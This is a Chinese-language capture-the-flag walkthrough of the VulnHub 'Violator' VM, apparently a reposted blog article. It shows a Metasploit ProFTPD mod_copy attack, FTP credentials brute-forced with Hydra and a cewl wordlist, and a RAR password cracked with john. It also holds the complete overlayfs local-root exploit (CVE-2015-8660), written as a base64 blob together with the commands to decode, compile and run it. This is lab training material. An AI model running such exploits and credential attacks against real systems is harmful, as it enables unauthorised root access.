01.靶场介绍
Description
Welcome to another boot2root / CTF this one is called Violator. The VM is set to grab a DHCP lease on boot. As with my previous VMs, there is a theme, and you will need to snag the flag in order to complete the challenge.
A word of warning: The VM has a small HDD so you can brute force, but please set the disk to non persistent so you can always revert.
Some hints for you:
-
Vince Clarke can help you with the Fast Fashion.
-
The challenge isn't over with root. The flag is something special.
-
I have put a few trolls in, but only to sport with you.
SHA1SUM: 47F68241E95E189126E94A38CB4AD461DD58EE88 violator.ova
Many thanks to BenR and GKNSB for testing this CTF.
Special thanks and shout-outs go to BenR, Rasta_Mouse and g0tmi1k for helping me to learn a lot creating these challenges.
欢迎来到另一个 boot2root / CTF,这个叫做 Violator。VM 设置为在启动时获取 DHCP 租约。与我之前的 VM 一样,有一个主题,您需要抓住旗帜才能完成挑战。
一句警告:虚拟机有一个小硬盘,所以你可以暴力破解,但请将磁盘设置为非持久性,这样你就可以随时恢复。
给你的一些提示:
-
文斯·克拉克 (Vince Clarke) 可以在快时尚方面为您提供帮助。
-
root 挑战还没有结束。旗帜很特别。
-
我放了几个巨魔,但只是为了和你玩。
下载地址:https://www.vulnhub.com/entry/violator-1,153/
02.信息收集
主机发现
端口扫描
目录扫描
目录扫描也没发现什么
敏感信息
这里有三个可以关注的点,一个标题、一个网站,一个图片。
图片没有啥信息
这里有个标题倒是可以试试
这里发现漏洞还是可以用的。
https://en.wikipedia.org/wiki/Violator_(album) 根据经验这里可能需要收集一些信息做字典。
03.获取权限
使用msf proftpd_modcopy_exec 模块获取权限
exploit unix/ftp/proftpd_modcopy_exec
python3 -c 'import pty;pty.spawn("/bin/bash")'
这里除了root,还有四个可以登录的账号
使用cewl 去爬取网站字典,然后去空处理后如下:
cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt --proxy_host 34.66.5.144 --proxy_port 8888
worldinmyeyes
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bludress
clean
cangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin
接下来就可以使用九头蛇进行爆破了。
[21][ftp] host: 192.168.43.112 login: aw password: sweetestperfection
[21][ftp] host: 192.168.43.112 login: af password: enjoythesilence
[21][ftp] host: 192.168.43.112 login: mg password: bluedress
[21][ftp] host: 192.168.43.112 login: dg password: policyoftruth
试了一下,这个四个账号都能登录
04.权限提升
这里直接使用内核进行提权,当然也可以用dg 账号里面的sudo进行提取。
没有 wgetcurl。。。‘
使用base64加密,然后写到服务器的时候解密保存
echo LyoKanVzdCBhbm90aGVyIG92ZXJsYXlmcyBleHBsb2l0LCB3b3JrcyBvbiBrZXJuZWxzIGJlZm9y
ZSAyMDE1LTEyLTI2CgojIEV4cGxvaXQgVGl0bGU6IG92ZXJsYXlmcyBsb2NhbCByb290CiMgRGF0
ZTogMjAxNi0wMS0wNQojIEV4cGxvaXQgQXV0aG9yOiByZWJlbAojIFZlcnNpb246IFVidW50dSAx
NC4wNCBMVFMsIDE1LjEwIGFuZCBtb3JlCiMgVGVzdGVkIG9uOiBVYnVudHUgMTQuMDQgTFRTLCAx
NS4xMAojIENWRSA6IENWRS0yMDE1LTg2NjAKCmJsYWhAdWJ1bnR1On4kIGlkCnVpZD0xMDAxKGJs
YWgpIGdpZD0xMDAxKGJsYWgpIGdyb3Vwcz0xMDAxKGJsYWgpCmJsYWhAdWJ1bnR1On4kIHVuYW1l
IC1hICYmIGNhdCAvZXRjL2lzc3VlCkxpbnV4IHVidW50dSAzLjE5LjAtNDItZ2VuZXJpYyAjNDh+
MTQuMDQuMS1VYnVudHUgU01QIEZyaSBEZWMgMTggMTA6MjQ6NDkgVVRDIDIwMTUgeDg2XzY0IHg4
Nl82NCB4ODZfNjQgR05VL0xpbnV4ClVidW50dSAxNC4wNC4zIExUUyBcbiBcbApibGFoQHVidW50
dTp+JCAuL292ZXJsYXlmYWlsCnJvb3RAdWJ1bnR1On4jIGlkCnVpZD0wKHJvb3QpIGdpZD0xMDAx
KGJsYWgpIGdyb3Vwcz0wKHJvb3QpLDEwMDEoYmxhaCkKCjEyLzIwMTUKYnkgcmViZWwKCjYzNTRi
NGUyM2RiMjI1YjU2NWQ3OWYyMjZmMmU0OWVjMGZlMWUxOWIKKi8KCiNpbmNsdWRlIDxzdGRpby5o
PgojaW5jbHVkZSA8c2NoZWQuaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgojaW5jbHVkZSA8dW5pc3Rk
Lmg+CiNpbmNsdWRlIDxzY2hlZC5oPgojaW5jbHVkZSA8c3lzL3N0YXQuaD4KI2luY2x1ZGUgPHN5
cy90eXBlcy5oPgojaW5jbHVkZSA8c3lzL21vdW50Lmg+CiNpbmNsdWRlIDxzdGRpby5oPgojaW5j
bHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KI2luY2x1ZGUgPHNjaGVkLmg+CiNp
bmNsdWRlIDxzeXMvc3RhdC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNsdWRlIDxzeXMv
bW91bnQuaD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8c2lnbmFsLmg+CiNpbmNs
dWRlIDxmY250bC5oPgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDxsaW51eC9zY2hlZC5o
PgojaW5jbHVkZSA8c3lzL3dhaXQuaD4KCnN0YXRpYyBjaGFyIGNoaWxkX3N0YWNrWzEwMjQqMTAy
NF07CgpzdGF0aWMgaW50CmNoaWxkX2V4ZWModm9pZCAqc3R1ZmYpCnsKICAgIHN5c3RlbSgicm0g
LXJmIC90bXAvaGF4aGF4Iik7CiAgICBta2RpcigiL3RtcC9oYXhoYXgiLCAwNzc3KTsKICAgIG1r
ZGlyKCIvdG1wL2hheGhheC93IiwgMDc3Nyk7CiAgICBta2RpcigiL3RtcC9oYXhoYXgvdSIsMDc3
Nyk7CiAgICBta2RpcigiL3RtcC9oYXhoYXgvbyIsMDc3Nyk7CgogICAgaWYgKG1vdW50KCJvdmVy
bGF5IiwgIi90bXAvaGF4aGF4L28iLCAib3ZlcmxheSIsIE1TX01HQ19WQUwsICJsb3dlcmRpcj0v
YmluLHVwcGVyZGlyPS90bXAvaGF4aGF4L3Usd29ya2Rpcj0vdG1wL2hheGhheC93IikgIT0gMCkg
ewoJZnByaW50ZihzdGRlcnIsIm1vdW50IGZhaWxlZC4uXG4iKTsKICAgIH0KCiAgICBjaG1vZCgi
L3RtcC9oYXhoYXgvdy93b3JrIiwwNzc3KTsKICAgIGNoZGlyKCIvdG1wL2hheGhheC9vIik7CiAg
ICBjaG1vZCgiYmFzaCIsMDQ3NTUpOwogICAgY2hkaXIoIi8iKTsKICAgIHVtb3VudCgiL3RtcC9o
YXhoYXgvbyIpOwogICAgcmV0dXJuIDA7Cn0KCmludAptYWluKGludCBhcmdjLCBjaGFyICoqYXJn
dikKewogICAgaW50IHN0YXR1czsKICAgIHBpZF90IHdyYXBwZXIsIGluaXQ7CiAgICBpbnQgY2xv
bmVfZmxhZ3MgPSBDTE9ORV9ORVdOUyB8IFNJR0NITEQ7CiAgICBzdHJ1Y3Qgc3RhdCBzOwoKICAg
IGlmKCh3cmFwcGVyID0gZm9yaygpKSA9PSAwKSB7CiAgICAgICAgaWYodW5zaGFyZShDTE9ORV9O
RVdVU0VSKSAhPSAwKQogICAgICAgICAgICBmcHJpbnRmKHN0ZGVyciwgImZhaWxlZCB0byBjcmVh
dGUgbmV3IHVzZXIgbmFtZXNwYWNlXG4iKTsKCiAgICAgICAgaWYoKGluaXQgPSBmb3JrKCkpID09
IDApIHsKICAgICAgICAgICAgcGlkX3QgcGlkID0KICAgICAgICAgICAgICAgIGNsb25lKGNoaWxk
X2V4ZWMsIGNoaWxkX3N0YWNrICsgKDEwMjQqMTAyNCksIGNsb25lX2ZsYWdzLCBOVUxMKTsKICAg
ICAgICAgICAgaWYocGlkIDwgMCkgewogICAgICAgICAgICAgICAgZnByaW50ZihzdGRlcnIsICJm
YWlsZWQgdG8gY3JlYXRlIG5ldyBtb3VudCBuYW1lc3BhY2VcbiIpOwogICAgICAgICAgICAgICAg
ZXhpdCgtMSk7CiAgICAgICAgICAgIH0KCiAgICAgICAgICAgIHdhaXRwaWQocGlkLCAmc3RhdHVz
LCAwKTsKCiAgICAgICAgfQoKICAgICAgICB3YWl0cGlkKGluaXQsICZzdGF0dXMsIDApOwogICAg
ICAgIHJldHVybiAwOwogICAgfQoKICAgIHVzbGVlcCgzMDAwMDApOwoKICAgIHdhaXQoTlVMTCk7
CgogICAgc3RhdCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwmcyk7CgogICAgaWYocy5zdF9tb2RlID09
IDB4ODllZCkKICAgICAgICBleGVjbCgiL3RtcC9oYXhoYXgvdS9iYXNoIiwiYmFzaCIsIi1wIiwi
LWMiLCJybSAtcmYgL3RtcC9oYXhoYXg7cHl0aG9uIC1jIFwiaW1wb3J0IG9zO29zLnNldHJlc3Vp
ZCgwLDAsMCk7b3MuZXhlY2woJy9iaW4vYmFzaCcsJ2Jhc2gnKTtcIiIsTlVMTCk7CgogICAgZnBy
aW50ZihzdGRlcnIsImNvdWxkbid0IGNyZWF0ZSBzdWlkIDooXG4iKTsKICAgIHJldHVybiAtMTsK
fQ==" | base64 -d > ex.c
chmod +x ex.c
gcc ex.c -o ex
./ex
提权成功
root下发现存在一个rar文件,但是需要爆破密码
接下来我们使用 rar2john 和 john 进行爆破,字典就是cewl 下来的密码。
1. 通过 rar2john 工具输出 rar 文件 hash
2. 通过 john 工具进行 rar 文件爆破
3. 查看爆破的密码
┌──(root㉿kali)-[~/下载]
└─# rar2john crocs.rar > password.hashes
! file name: artwork.jpg
┌──(root㉿kali)-[~/下载]
└─# john --wordlist=/root/violator.txt --rules password.hashes
Using default input encoding: UTF-8
Loaded 1 password hash (rar, RAR3 [SHA1 256/256 AVX2 8x AES])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
World in My Eyes (crocs.rar)
1g 0:00:00:02 DONE (2023-04-13 09:45) 0.3968g/s 165.0p/s 165.0c/s 165.0C/s worldinmyeyes..suoregnaD
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
密码爆破如下:
解压后可以看到图片如下,图片隐写存在密码。但是这里的密码没解密出来。
End
原文始发于微信公众号(贝雷帽SEC):NO.6 violator 靶场
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论